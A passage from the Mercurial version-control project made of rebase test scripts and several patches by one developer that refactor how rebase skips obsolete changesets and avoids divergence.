files unresolved - $ echo "K" > K - $ hg add K - $ hg commit --amend -m "K" - 1 new orphan changesets - $ echo "L" > L - $ hg add L - $ hg commit -m "L" - $ hg up '.^' - 0 files updated, 0 files merged, 1 files removed, 0 files unresolved - $ echo "M" > M - $ hg add M - $ hg commit --amend -m "M" - 1 new orphan changesets - $ hg log -G - @ 18:bfaedf8eb73b M - | - | * 17:97219452e4bd L - | | - | x 16:fc37a630c901 K (rewritten using amend as 18:bfaedf8eb73b) - |/ - | * 15:5ae8a643467b J - | | - | x 14:9ad579b4a5de I (rewritten using amend as 16:fc37a630c901) - |/ - | * 12:acd174b7ab39 I - | | - | o 11:6c11a6218c97 H - | | - o | 10:b5313c85b22e D - |/ - | * 8:53a6a128b2b7 M - | |\ - | | x 7:02de42196ebe H (rewritten using rebase as 11:6c11a6218c97) - | | | - o---+ 6:eea13746799a 
G - | | | - | | o 5:24b6387c8c8c F - | | | - o---+ 4:9520eea781bc E - / / - x | 3:32af7686d403 D (rewritten using rebase as 10:b5313c85b22e) - | | - o | 2:5fddd98957c8 C - | | - o | 1:42ccdea3bb16 B - |/ - o 0:cd010b8cd998 A - - $ hg rebase -s 14 -d 17 --config experimental.rebaseskipobsolete=True - note: not rebasing 14:9ad579b4a5de "I", already in destination as 16:fc37a630c901 "K" - rebasing 15:5ae8a643467b "J" - 1 new orphan changesets - - $ cd .. - -Skip obsolete changeset even with multiple hops ------------------------------------------------ - -setup - - $ hg init obsskip - $ cd obsskip - $ cat << EOF >> .hg/hgrc - > [experimental] - > rebaseskipobsolete = True - > [extensions] - > strip = - > EOF - $ echo A > A - $ hg add A - $ hg commit -m A - $ echo B > B - $ hg add B - $ hg commit -m B0 - $ hg commit --amend -m B1 - $ hg commit --amend -m B2 - $ hg up --hidden 'desc(B0)' - 0 files updated, 0 files merged, 0 files removed, 0 files unresolved - updated to hidden changeset a8b11f55fb19 - (hidden revision 'a8b11f55fb19' was rewritten as: 261e70097290) - $ echo C > C - $ hg add C - $ hg commit -m C - 1 new orphan changesets - $ hg log -G - @ 4:212cb178bcbb C - | - | o 3:261e70097290 B2 - | | - x | 1:a8b11f55fb19 B0 (rewritten using amend as 3:261e70097290) - |/ - o 0:4a2df7238c3b A - - -Rebase finds its way in a chain of marker - - $ hg rebase -d 'desc(B2)' - note: not rebasing 1:a8b11f55fb19 "B0", already in destination as 3:261e70097290 "B2" - rebasing 4:212cb178bcbb tip "C" - -Even when the chain include missing node - - $ hg up --hidden 'desc(B0)' - 0 files updated, 0 files merged, 1 files removed, 0 files unresolved - updated to hidden changeset a8b11f55fb19 - (hidden revision 'a8b11f55fb19' was rewritten as: 261e70097290) - $ echo D > D - $ hg add D - $ hg commit -m D - 1 new orphan changesets - $ hg --hidden strip -r 'desc(B1)' - saved backup bundle to $TESTTMP/obsskip/.hg/strip-backup/86f6414ccda7-b1c452ee-backup.hg - 1 new orphan changesets - $ hg 
log -G - @ 5:1a79b7535141 D - | - | o 4:ff2c4d47b71d C - | | - | o 2:261e70097290 B2 - | | - x | 1:a8b11f55fb19 B0 (rewritten using amend as 2:261e70097290) - |/ - o 0:4a2df7238c3b A - - - $ hg rebase -d 'desc(B2)' - note: not rebasing 1:a8b11f55fb19 "B0", already in destination as 2:261e70097290 "B2" - rebasing 5:1a79b7535141 tip "D" - $ hg up 4 - 1 files updated, 0 files merged, 1 files removed, 0 files unresolved - $ echo "O" > O - $ hg add O - $ hg commit -m O - $ echo "P" > P - $ hg add P - $ hg commit -m P - $ hg log -G - @ 8:8d47583e023f P - | - o 7:360bbaa7d3ce O - | - | o 6:9c48361117de D - | | - o | 4:ff2c4d47b71d C - |/ - o 2:261e70097290 B2 - | - o 0:4a2df7238c3b A - - $ hg debugobsolete `hg log -r 7 -T '{node}\n'` --config experimental.evolution=true - 1 new obsolescence markers - obsoleted 1 changesets - 1 new orphan changesets - $ hg rebase -d 6 -r "4::" - rebasing 4:ff2c4d47b71d "C" - note: not rebasing 7:360bbaa7d3ce "O", it has no successor - rebasing 8:8d47583e023f tip "P" - -If all the changeset to be rebased are obsolete and present in the destination, we -should display a friendly error message - - $ hg log -G - @ 10:121d9e3bc4c6 P - | - o 9:4be60e099a77 C - | - o 6:9c48361117de D - | - o 2:261e70097290 B2 - | - o 0:4a2df7238c3b A - - - $ hg up 9 - 0 files updated, 0 files merged, 1 files removed, 0 files unresolved - $ echo "non-relevant change" > nonrelevant - $ hg add nonrelevant - $ hg commit -m nonrelevant - created new head - $ hg debugobsolete `hg log -r 11 -T '{node}\n'` --config experimental.evolution=true - 1 new obsolescence markers - obsoleted 1 changesets - $ hg log -G - @ 11:f44da1f4954c nonrelevant (pruned) - | - | o 10:121d9e3bc4c6 P - |/ - o 9:4be60e099a77 C - | - o 6:9c48361117de D - | - o 2:261e70097290 B2 - | - o 0:4a2df7238c3b A - - $ hg rebase -r . 
-d 10 - note: not rebasing 11:f44da1f4954c tip "nonrelevant", it has no successor - -If a rebase is going to create divergence, it should abort - - $ hg log -G - @ 10:121d9e3bc4c6 P - | - o 9:4be60e099a77 C - | - o 6:9c48361117de D - | - o 2:261e70097290 B2 - | - o 0:4a2df7238c3b A - - - $ hg up 9 - 0 files updated, 0 files merged, 1 files removed, 0 files unresolved - $ echo "john" > doe - $ hg add doe - $ hg commit -m "john doe" - created new head - $ hg up 10 - 1 files updated, 0 files merged, 1 files removed, 0 files unresolved - $ echo "foo" > bar - $ hg add bar - $ hg commit --amend -m "10'" - $ hg up 10 --hidden - 0 files updated, 0 files merged, 1 files removed, 0 files unresolved - updated to hidden changeset 121d9e3bc4c6 - (hidden revision '121d9e3bc4c6' was rewritten as: 77d874d096a2) - $ echo "bar" > foo - $ hg add foo - $ hg commit -m "bar foo" - 1 new orphan changesets - $ hg log -G - @ 14:73568ab6879d bar foo - | - | o 13:77d874d096a2 10' - | | - | | o 12:3eb461388009 john doe - | |/ - x | 10:121d9e3bc4c6 P (rewritten using amend as 13:77d874d096a2) - |/ - o 9:4be60e099a77 C - | - o 6:9c48361117de D - | - o 2:261e70097290 B2 - | - o 0:4a2df7238c3b A - - $ hg summary - parent: 14:73568ab6879d tip (orphan) - bar foo - branch: default - commit: (clean) - update: 2 new changesets, 3 branch heads (merge) - phases: 8 draft - orphan: 1 changesets - $ hg rebase -s 10 -d 12 - abort: this rebase will cause divergences from: 121d9e3bc4c6 - (to force the rebase please set experimental.evolution.allowdivergence=True) - [20] - $ hg log -G - @ 14:73568ab6879d bar foo - | - | o 13:77d874d096a2 10' - | | - | | o 12:3eb461388009 john doe - | |/ - x | 10:121d9e3bc4c6 P (rewritten using amend as 13:77d874d096a2) - |/ - o 9:4be60e099a77 C - | - o 6:9c48361117de D - | - o 2:261e70097290 B2 - | - o 0:4a2df7238c3b A - -With experimental.evolution.allowdivergence=True, rebase can create divergence - - $ hg rebase -s 10 -d 12 --config 
experimental.evolution.allowdivergence=True - rebasing 10:121d9e3bc4c6 "P" - rebasing 14:73568ab6879d tip "bar foo" - 2 new content-divergent changesets - $ hg summary - parent: 16:61bd55f69bc4 tip - bar foo - branch: default - commit: (clean) - update: 1 new changesets, 2 branch heads (merge) - phases: 8 draft - content-divergent: 2 changesets - -rebase --continue + skipped rev because their successors are in destination -we make a change in trunk and work on conflicting changes to make rebase abort. - - $ hg log -G -r 16:: - @ 16:61bd55f69bc4 bar foo - | - ~ - -Create the two changes in trunk - $ printf "a" > willconflict - $ hg add willconflict - $ hg commit -m "willconflict first version" - - $ printf "dummy" > C - $ hg commit -m "dummy change successor" - -Create the changes that we will rebase - $ hg update -C 16 -q - $ printf "b" > willconflict - $ hg add willconflict - $ hg commit -m "willconflict second version" - created new head - $ printf "dummy" > K - $ hg add K - $ hg commit -m "dummy change" - $ printf "dummy" > L - $ hg add L - $ hg commit -m "dummy change" - $ hg debugobsolete `hg log -r ".^" -T '{node}'` `hg log -r 18 -T '{node}'` --config experimental.evolution=true - 1 new obsolescence markers - obsoleted 1 changesets - 1 new orphan changesets - - $ hg log -G -r 16:: - @ 21:7bdc8a87673d dummy change - | - x 20:8b31da3c4919 dummy change (rewritten as 18:601db7a18f51) - | - o 19:b82fb57ea638 willconflict second version - | - | o 18:601db7a18f51 dummy change successor - | | - | o 17:357ddf1602d5 willconflict first version - |/ - o 16:61bd55f69bc4 bar foo - | - ~ - $ hg rebase -r ".^^ + .^ + ." -d 18 - rebasing 19:b82fb57ea638 "willconflict second version" - merging willconflict - warning: conflicts while merging willconflict! 
(edit, then use 'hg resolve --mark') - unresolved conflicts (see 'hg resolve', then 'hg rebase --continue') - [240] - - $ hg resolve --mark willconflict - (no more unresolved files) - continue: hg rebase --continue - $ hg rebase --continue - rebasing 19:b82fb57ea638 "willconflict second version" - note: not rebasing 20:8b31da3c4919 "dummy change", already in destination as 18:601db7a18f51 "dummy change successor" - rebasing 21:7bdc8a87673d tip "dummy change" - $ cd .. - -Divergence cases due to obsolete changesets -------------------------------------------- - -We should ignore branches with unstable changesets when they are based on an -obsolete changeset which successor is in rebase set. - - $ hg init divergence - $ cd divergence - $ cat >> .hg/hgrc << EOF - > [extensions] - > strip = - > [alias] - > strip = strip --no-backup --quiet - > [templates] - > instabilities = '{rev}:{node|short} {desc|firstline}{if(instabilities," ({instabilities})")}\n' - > EOF - - $ hg debugdrawdag <<EOF - > e f - > | | - > d' d # replace: d -> d' - > \ / - > c - > | - > x b - > \| - > a - > EOF - 1 new orphan changesets - $ hg log -G -r 'a':: - * 7:1143e9adc121 f - | - | o 6:d60ebfa0f1cb e - | | - | o 5:027ad6c5830d d' - | | - x | 4:76be324c128b d (rewritten using replace as 5:027ad6c5830d) - |/ - o 3:a82ac2b38757 c - | - | o 2:630d7c95eff7 x - | | - o | 1:488e1b7e7341 b - |/ - o 0:b173517d0057 a - - -Changeset d and its descendants are excluded to avoid divergence of d, which -would occur because the successor of d (d') is also in rebaseset. As a -consequence f (descendant of d) is left behind. 
- - $ hg rebase -b 'e' -d 'x' - rebasing 1:488e1b7e7341 b "b" - rebasing 3:a82ac2b38757 c "c" - rebasing 5:027ad6c5830d d' "d'" - rebasing 6:d60ebfa0f1cb e "e" - note: not rebasing 4:76be324c128b d "d" and its descendants as this would cause divergence - $ hg log -G -r 'a':: - o 11:eb6d63fc4ed5 e - | - o 10:44d8c724a70c d' - | - o 9:d008e6b4d3fd c - | - o 8:67e8f4a16c49 b - | - | * 7:1143e9adc121 f - | | - | | x 6:d60ebfa0f1cb e (rewritten using rebase as 11:eb6d63fc4ed5) - | | | - | | x 5:027ad6c5830d d' (rewritten using rebase as 10:44d8c724a70c) - | | | - | x | 4:76be324c128b d (rewritten using replace as 5:027ad6c5830d) - | |/ - | x 3:a82ac2b38757 c (rewritten using rebase as 9:d008e6b4d3fd) - | | - o | 2:630d7c95eff7 x - | | - | x 1:488e1b7e7341 b (rewritten using rebase as 8:67e8f4a16c49) - |/ - o 0:b173517d0057 a - - $ hg strip -r 8: - $ hg log -G -r 'a':: - * 7:1143e9adc121 f - | - | o 6:d60ebfa0f1cb e - | | - | o 5:027ad6c5830d d' - | | - x | 4:76be324c128b d (rewritten using replace as 5:027ad6c5830d) - |/ - o 3:a82ac2b38757 c - | - | o 2:630d7c95eff7 x - | | - o | 1:488e1b7e7341 b - |/ - o 0:b173517d0057 a - - -If the rebase set has an obsolete (d) with a successor (d') outside the rebase -set and none in destination, we still get the divergence warning. -By allowing divergence, we can perform the rebase. 
- - $ hg rebase -r 'c'::'f' -d 'x' - abort: this rebase will cause divergences from: 76be324c128b - (to force the rebase please set experimental.evolution.allowdivergence=True) - [20] - $ hg rebase --config experimental.evolution.allowdivergence=true -r 'c'::'f' -d 'x' - rebasing 3:a82ac2b38757 c "c" - rebasing 4:76be324c128b d "d" - rebasing 7:1143e9adc121 f tip "f" - 1 new orphan changesets - 2 new content-divergent changesets - $ hg log -G -r 'a':: -T instabilities - o 10:e1744ea07510 f - | - * 9:e2b36ea9a0a0 d (content-divergent) - | - o 8:6a0376de376e c - | - | x 7:1143e9adc121 f - | | - | | * 6:d60ebfa0f1cb e (orphan) - | | | - | | * 5:027ad6c5830d d' (orphan content-divergent) - | | | - | x | 4:76be324c128b d - | |/ - | x 3:a82ac2b38757 c - | | - o | 2:630d7c95eff7 x - | | - | o 1:488e1b7e7341 b - |/ - o 0:b173517d0057 a - - $ hg strip -r 8: - -(Not skipping obsoletes means that divergence is allowed.) - - $ hg rebase --config experimental.rebaseskipobsolete=false -r 'c'::'f' -d 'x' - rebasing 3:a82ac2b38757 c "c" - rebasing 4:76be324c128b d "d" - rebasing 7:1143e9adc121 f tip "f" - 1 new orphan changesets - 2 new content-divergent changesets - - $ hg strip -r 0: - -Similar test on a more complex graph - - $ hg debugdrawdag <<EOF - > g - > | - > f e - > | | - > e' d # replace: e -> e' - > \ / - > c - > | - > x b - > \| - > a - > EOF - 1 new orphan changesets - $ hg log -G -r 'a': - * 8:2876ce66c6eb g - | - | o 7:3ffec603ab53 f - | | - x | 6:e36fae928aec e (rewritten using replace as 5:63324dc512ea) - | | - | o 5:63324dc512ea e' - | | - o | 4:76be324c128b d - |/ - o 3:a82ac2b38757 c - | - | o 2:630d7c95eff7 x - | | - o | 1:488e1b7e7341 b - |/ - o 0:b173517d0057 a - - $ hg rebase -b 'f' -d 'x' - rebasing 1:488e1b7e7341 b "b" - rebasing 3:a82ac2b38757 c "c" - rebasing 5:63324dc512ea e' "e'" - rebasing 7:3ffec603ab53 f "f" - rebasing 4:76be324c128b d "d" - note: not rebasing 6:e36fae928aec e "e" and its descendants as this would cause divergence - $ hg log -G -r 
'a': - o 13:a1707a5b7c2c d - | - | o 12:ef6251596616 f - | | - | o 11:b6f172e64af9 e' - |/ - o 10:d008e6b4d3fd c - | - o 9:67e8f4a16c49 b - | - | * 8:2876ce66c6eb g - | | - | | x 7:3ffec603ab53 f (rewritten using rebase as 12:ef6251596616) - | | | - | x | 6:e36fae928aec e (rewritten using replace as 5:63324dc512ea) - | | | - | | x 5:63324dc512ea e' (rewritten using rebase as 11:b6f172e64af9) - | | | - | x | 4:76be324c128b d (rewritten using rebase as 13:a1707a5b7c2c) - | |/ - | x 3:a82ac2b38757 c (rewritten using rebase as 10:d008e6b4d3fd) - | | - o | 2:630d7c95eff7 x - | | - | x 1:488e1b7e7341 b (rewritten using rebase as 9:67e8f4a16c49) - |/ - o 0:b173517d0057 a - - -issue5782 - $ hg strip -r 0: - $ hg debugdrawdag <<EOF - > d - > | - > c1 c # replace: c -> c1 - > \ / - > b - > | - > a - > EOF - 1 new orphan changesets - $ hg debugobsolete `hg log -T "{node}" --hidden -r 'desc("c1")'` - 1 new obsolescence markers - obsoleted 1 changesets - $ hg log -G -r 'a': --hidden - * 4:76be324c128b d - | - | x 3:ef8a456de8fa c1 (pruned) - | | - x | 2:a82ac2b38757 c (rewritten using replace as 3:ef8a456de8fa) - |/ - o 1:488e1b7e7341 b - | - o 0:b173517d0057 a - - $ hg rebase -d 0 -r 2 - note: not rebasing 2:a82ac2b38757 c "c", it has no successor - $ hg log -G -r 'a': --hidden - * 4:76be324c128b d - | - | x 3:ef8a456de8fa c1 (pruned) - | | - x | 2:a82ac2b38757 c (rewritten using replace as 3:ef8a456de8fa) - |/ - o 1:488e1b7e7341 b - | - o 0:b173517d0057 a - - $ cd .. 
- -Rebase merge where successor of one parent is equal to destination (issue5198) - - $ hg init p1-succ-is-dest - $ cd p1-succ-is-dest - - $ hg debugdrawdag <<EOF - > F - > /| - > E D B # replace: D -> B - > \|/ - > A - > EOF - 1 new orphan changesets - - $ hg rebase -d B -s D - note: not rebasing 2:b18e25de2cf5 D "D", already in destination as 1:112478962961 B "B" - rebasing 4:66f1a38021c9 F tip "F" - $ hg log -G - o 5:50e9d60b99c6 F - |\ - | | x 4:66f1a38021c9 F (rewritten using rebase as 5:50e9d60b99c6) - | |/| - | o | 3:7fb047a69f22 E - | | | - | | x 2:b18e25de2cf5 D (rewritten using replace as 1:112478962961) - | |/ - o | 1:112478962961 B - |/ - o 0:426bada5c675 A - - $ cd .. - -Rebase merge where successor of other parent is equal to destination - - $ hg init p2-succ-is-dest - $ cd p2-succ-is-dest - - $ hg debugdrawdag <<EOF - > F - > /| - > E D B # replace: E -> B - > \|/ - > A - > EOF - 1 new orphan changesets - - $ hg rebase -d B -s E - note: not rebasing 3:7fb047a69f22 E "E", already in destination as 1:112478962961 B "B" - rebasing 4:66f1a38021c9 F tip "F" - $ hg log -G - o 5:aae1787dacee F - |\ - | | x 4:66f1a38021c9 F (rewritten using rebase as 5:aae1787dacee) - | |/| - | | x 3:7fb047a69f22 E (rewritten using replace as 1:112478962961) - | | | - | o | 2:b18e25de2cf5 D - | |/ - o / 1:112478962961 B - |/ - o 0:426bada5c675 A - - $ cd .. 
- -Rebase merge where successor of one parent is ancestor of destination - - $ hg init p1-succ-in-dest - $ cd p1-succ-in-dest - - $ hg debugdrawdag <<EOF - > F C - > /| | - > E D B # replace: D -> B - > \|/ - > A - > EOF - 1 new orphan changesets - - $ hg rebase -d C -s D - note: not rebasing 2:b18e25de2cf5 D "D", already in destination as 1:112478962961 B "B" - rebasing 5:66f1a38021c9 F tip "F" - - $ hg log -G - o 6:0913febf6439 F - |\ - +---x 5:66f1a38021c9 F (rewritten using rebase as 6:0913febf6439) - | | | - | o | 4:26805aba1e60 C - | | | - o | | 3:7fb047a69f22 E - | | | - +---x 2:b18e25de2cf5 D (rewritten using replace as 1:112478962961) - | | - | o 1:112478962961 B - |/ - o 0:426bada5c675 A - - $ cd .. - -Rebase merge where successor of other parent is ancestor of destination - - $ hg init p2-succ-in-dest - $ cd p2-succ-in-dest - - $ hg debugdrawdag <<EOF - > F C - > /| | - > E D B # replace: E -> B - > \|/ - > A - > EOF - 1 new orphan changesets - - $ hg rebase -d C -s E - note: not rebasing 3:7fb047a69f22 E "E", already in destination as 1:112478962961 B "B" - rebasing 5:66f1a38021c9 F tip "F" - $ hg log -G - o 6:c6ab0cc6d220 F - |\ - +---x 5:66f1a38021c9 F (rewritten using rebase as 6:c6ab0cc6d220) - | | | - | o | 4:26805aba1e60 C - | | | - | | x 3:7fb047a69f22 E (rewritten using replace as 1:112478962961) - | | | - o---+ 2:b18e25de2cf5 D - / / - o / 1:112478962961 B - |/ - o 0:426bada5c675 A - - $ cd .. 
- -Rebase merge where successor of one parent is ancestor of destination - - $ hg init p1-succ-in-dest-b - $ cd p1-succ-in-dest-b - - $ hg debugdrawdag <<EOF - > F C - > /| | - > E D B # replace: E -> B - > \|/ - > A - > EOF - 1 new orphan changesets - - $ hg rebase -d C -b F - rebasing 2:b18e25de2cf5 D "D" - note: not rebasing 3:7fb047a69f22 E "E", already in destination as 1:112478962961 B "B" - rebasing 5:66f1a38021c9 F tip "F" - note: not rebasing 5:66f1a38021c9 F tip "F", its destination already has all its changes - $ hg log -G - o 6:8f47515dda15 D - | - | x 5:66f1a38021c9 F (pruned using rebase) - | |\ - o | | 4:26805aba1e60 C - | | | - | | x 3:7fb047a69f22 E (rewritten using replace as 1:112478962961) - | | | - | x | 2:b18e25de2cf5 D (rewritten using rebase as 6:8f47515dda15) - | |/ - o / 1:112478962961 B - |/ - o 0:426bada5c675 A - - $ cd .. - -Rebase merge where successor of other parent is ancestor of destination - - $ hg init p2-succ-in-dest-b - $ cd p2-succ-in-dest-b - - $ hg debugdrawdag <<EOF - > F C - > /| | - > E D B # replace: D -> B - > \|/ - > A - > EOF - 1 new orphan changesets - - $ hg rebase -d C -b F - note: not rebasing 2:b18e25de2cf5 D "D", already in destination as 1:112478962961 B "B" - rebasing 3:7fb047a69f22 E "E" - rebasing 5:66f1a38021c9 F tip "F" - note: not rebasing 5:66f1a38021c9 F tip "F", its destination already has all its changes - - $ hg log -G - o 6:533690786a86 E - | - | x 5:66f1a38021c9 F (pruned using rebase) - | |\ - o | | 4:26805aba1e60 C - | | | - | | x 3:7fb047a69f22 E (rewritten using rebase as 6:533690786a86) - | | | - | x | 2:b18e25de2cf5 D (rewritten using replace as 1:112478962961) - | |/ - o / 1:112478962961 B - |/ - o 0:426bada5c675 A - - $ cd .. 
- -Rebase merge where extinct node has successor that is not an ancestor of -destination - - $ hg init extinct-with-succ-not-in-dest - $ cd extinct-with-succ-not-in-dest - - $ hg debugdrawdag <<EOF - > E C # replace: C -> E - > | | - > D B - > |/ - > A - > EOF - - $ hg rebase -d D -s B - rebasing 1:112478962961 B "B" - note: not rebasing 3:26805aba1e60 C "C" and its descendants as this would cause divergence - - $ cd .. - - $ hg init p2-succ-in-dest-c - $ cd p2-succ-in-dest-c - -The scenario here was that B::D were developed on default. B was queued on -stable, but amended before being push to hg-committed. C was queued on default, -along with unrelated J. - - $ hg debugdrawdag <<EOF - > J - > | - > F - > | - > E - > | D - > | | - > | C # replace: C -> F - > | | H I # replace: B -> H -> I - > | B |/ - > |/ G - > A - > EOF - 1 new orphan changesets - -This strip seems to be the key to avoid an early divergence warning. - $ hg --config extensions.strip= --hidden strip -qr H - 1 new orphan changesets - - $ hg rebase -b 'desc("D")' -d 'desc("J")' - abort: this rebase will cause divergences from: 112478962961 - (to force the rebase please set experimental.evolution.allowdivergence=True) - [20] - -Rebase merge where both parents have successors in destination - - $ hg init p12-succ-in-dest - $ cd p12-succ-in-dest - $ hg debugdrawdag <<'EOS' - > E F - > /| /| # replace: A -> C - > A B C D # replace: B -> D - > | | - > X Y - > EOS - 1 new orphan changesets - $ hg rebase -r A+B+E -d F - note: not rebasing 4:a3d17304151f A "A", already in destination as 0:96cc3511f894 C "C" - note: not rebasing 5:b23a2cc00842 B "B", already in destination as 1:058c1e1fb10a D "D" - rebasing 7:dac5d11c5a7d E tip "E" - abort: rebasing 7:dac5d11c5a7d will include unwanted changes from 3:59c792af609c, 5:b23a2cc00842 or 2:ba2b7fa7166d, 4:a3d17304151f - [10] - $ cd .. - -Rebase a non-clean merge. One parent has successor in destination, the other -parent moves as requested. 
- - $ hg init p1-succ-p2-move - $ cd p1-succ-p2-move - $ hg debugdrawdag <<'EOS' - > D Z - > /| | # replace: A -> C - > A B C # D/D = D - > EOS - 1 new orphan changesets - $ hg rebase -r A+B+D -d Z - note: not rebasing 0:426bada5c675 A "A", already in destination as 2:96cc3511f894 C "C" - rebasing 1:fc2b737bb2e5 B "B" - rebasing 3:b8ed089c80ad D "D" - - $ rm .hg/localtags - $ hg log -G - o 6:e4f78693cc88 D - | - o 5:76840d832e98 B - | - o 4:50e41c1f3950 Z - | - o 2:96cc3511f894 C - - $ hg files -r tip - B - C - D - Z - - $ cd .. - - $ hg init p1-move-p2-succ - $ cd p1-move-p2-succ - $ hg debugdrawdag <<'EOS' - > D Z - > /| | # replace: B -> C - > A B C # D/D = D - > EOS - 1 new orphan changesets - $ hg rebase -r B+A+D -d Z - rebasing 0:426bada5c675 A "A" - note: not rebasing 1:fc2b737bb2e5 B "B", already in destination as 2:96cc3511f894 C "C" - rebasing 3:b8ed089c80ad D "D" - - $ rm .hg/localtags - $ hg log -G - o 6:1b355ed94d82 D - | - o 5:a81a74d764a6 A - | - o 4:50e41c1f3950 Z - | - o 2:96cc3511f894 C - - $ hg files -r tip - A - C - D - Z - - $ cd .. - Test that bookmark is moved and working dir is updated when all changesets have equivalents in destination $ hg init rbsrepo && cd rbsrepo # HG changeset patch # User Martin von Zweigbergk <martinvonz@google.com> # Date 1616519578 25200 # Tue Mar 23 10:12:58 2021 -0700 # Node ID 6648307d4fe84a48eb4603d61f1274bc093979bf # Parent 13b200ffe8eb08ca6c3aa1e2076f0971fef30c12 tests: test divergence created during interrupted rebase If a rebase runs into conflicts and the user somehow rewrites an unrebased commit in the rebase set while the rebase is interrupted, continuing it might result in divergence. It turns out that we decide to skip the commit. That seems to make sense, but it wasn't obvious to me that that's what we should do. Either way, this patch adds a test case for the current behavior. 
Differential Revision: https://phab.mercurial-scm.org/D10256 diff --git a/tests/test-rebase-obsolete3.t b/tests/test-rebase-obsolete3.t --- a/tests/test-rebase-obsolete3.t +++ b/tests/test-rebase-obsolete3.t @@ -282,6 +282,49 @@ $ cd .. +Start a normal rebase. When it runs into conflicts, rewrite one of the +commits in the rebase set, causing divergence when the rebase continues. + + $ hg init $TESTTMP/new-divergence-after-conflict + $ cd $TESTTMP/new-divergence-after-conflict + $ hg debugdrawdag <<'EOS' + > C2 + > | C1 + > |/ + > B # B/D=B + > | D + > |/ + > A + > EOS + $ hg rebase -r B::C1 -d D + rebasing 1:2ec65233581b B "B" + merging D + warning: conflicts while merging D! (edit, then use 'hg resolve --mark') + unresolved conflicts (see 'hg resolve', then 'hg rebase --continue') + [240] + $ hg debugobsolete $(hg log -r C1 -T '{node}') $(hg log -r C2 -T '{node}') + 1 new obsolescence markers + obsoleted 1 changesets + $ hg log -G + o 4:fdb9df6b130c C2 + | + | x 3:7e5bfd3c08f0 C1 (rewritten as 4:fdb9df6b130c) + |/ + | @ 2:b18e25de2cf5 D + | | + % | 1:2ec65233581b B + |/ + o 0:426bada5c675 A + + $ echo resolved > D + $ hg resolve -m D + (no more unresolved files) + continue: hg rebase --continue + $ hg rebase -c + rebasing 1:2ec65233581b B "B" + note: not rebasing 3:7e5bfd3c08f0 C1 "C1" and its descendants as this would cause divergence + 1 new orphan changesets + Rebase merge where successor of one parent is equal to destination (issue5198) $ hg init p1-succ-is-dest # HG changeset patch # User Martin von Zweigbergk <martinvonz@google.com> # Date 1613175573 28800 # Fri Feb 12 16:19:33 2021 -0800 # Node ID 7d80622fc21276aa17b0cc958c3d2494eb6ddf0e # Parent 6648307d4fe84a48eb4603d61f1274bc093979bf rebase: let _handleskippingobsolete(self) read directly from self The function already has `self` as an argument, so there's no need to pass data from `self` into it. 
Differential Revision: https://phab.mercurial-scm.org/D10246 diff --git a/hgext/rebase.py b/hgext/rebase.py --- a/hgext/rebase.py +++ b/hgext/rebase.py @@ -348,20 +348,16 @@ return data - def _handleskippingobsolete(self, obsoleterevs, destmap): - """Compute structures necessary for skipping obsolete revisions - - obsoleterevs: iterable of all obsolete revisions in rebaseset - destmap: {srcrev: destrev} destination revisions - """ + def _handleskippingobsolete(self): + """Compute structures necessary for skipping obsolete revisions""" self.obsoletenotrebased = {} if not self.ui.configbool(b'experimental', b'rebaseskipobsolete'): return - obsoleteset = set(obsoleterevs) + obsoleteset = {r for r in self.state if self.repo[r].obsolete()} ( self.obsoletenotrebased, self.obsoletewithoutsuccessorindestination, - ) = _computeobsoletenotrebased(self.repo, obsoleteset, destmap) + ) = _computeobsoletenotrebased(self.repo, obsoleteset, self.destmap) skippedset = set(self.obsoletenotrebased) skippedset.update(self.obsoletewithoutsuccessorindestination) _checkobsrebase(self.repo, self.ui, obsoleteset, skippedset) @@ -472,8 +468,7 @@ ) # Calculate self.obsoletenotrebased - obsrevs = {r for r in self.state if self.repo[r].obsolete()} - self._handleskippingobsolete(obsrevs, self.destmap) + self._handleskippingobsolete() # Keep track of the active bookmarks in order to reset them later self.activebookmark = self.activebookmark or repo._activebookmark # HG changeset patch # User Martin von Zweigbergk <martinvonz@google.com> # Date 1613174702 28800 # Fri Feb 12 16:05:02 2021 -0800 # Node ID d95edcbe5c99e8f489022f7627f27304c06c90b3 # Parent 7d80622fc21276aa17b0cc958c3d2494eb6ddf0e rebase: calculate obsolescense-related info earlier My goal is to use `rewriteutil.precheck()` in the rebase code. Since rebase does its own handling of divergent commits (it skips them instead of erroring out), we need to have divergence-causing commits filtered out early. This patch helps prepare for that. 
Differential Revision: https://phab.mercurial-scm.org/D10247 diff --git a/hgext/rebase.py b/hgext/rebase.py --- a/hgext/rebase.py +++ b/hgext/rebase.py @@ -368,6 +368,8 @@ self.resume = True try: self.restorestatus() + # Calculate self.obsoletenotrebased + self._handleskippingobsolete() self.collapsemsg = restorecollapsemsg(self.repo, isabort) except error.RepoLookupError: if isabort: @@ -434,6 +436,9 @@ self.prepared = True + # Calculate self.obsoletenotrebased + self._handleskippingobsolete() + def _assignworkingcopy(self): if self.inmemory: from mercurial.context import overlayworkingctx @@ -467,9 +472,6 @@ _(b'cannot collapse multiple named branches') ) - # Calculate self.obsoletenotrebased - self._handleskippingobsolete() - # Keep track of the active bookmarks in order to reset them later self.activebookmark = self.activebookmark or repo._activebookmark if self.activebookmark: # HG changeset patch # User Martin von Zweigbergk <martinvonz@google.com> # Date 1616175256 25200 # Fri Mar 19 10:34:16 2021 -0700 # Node ID 47c251a145255b30061971a4c241567b78e83158 # Parent d95edcbe5c99e8f489022f7627f27304c06c90b3 rebase: clarify names of variables and function related to obsolete revisions Differential Revision: https://phab.mercurial-scm.org/D10248 diff --git a/hgext/rebase.py b/hgext/rebase.py --- a/hgext/rebase.py +++ b/hgext/rebase.py @@ -205,8 +205,8 @@ self.skipemptysuccessorf = rewriteutil.skip_empty_successor( repo.ui, b'rebase' ) - self.obsoletenotrebased = {} - self.obsoletewithoutsuccessorindestination = set() + self.obsolete_with_successor_in_destination = {} + self.obsolete_with_successor_in_rebase_set = set() self.inmemory = inmemory self.dryrun = dryrun self.stateobj = statemod.cmdstate(repo, b'rebasestate') @@ -350,16 +350,16 @@ def _handleskippingobsolete(self): """Compute structures necessary for skipping obsolete revisions""" - self.obsoletenotrebased = {} + self.obsolete_with_successor_in_destination = {} if not self.ui.configbool(b'experimental', 
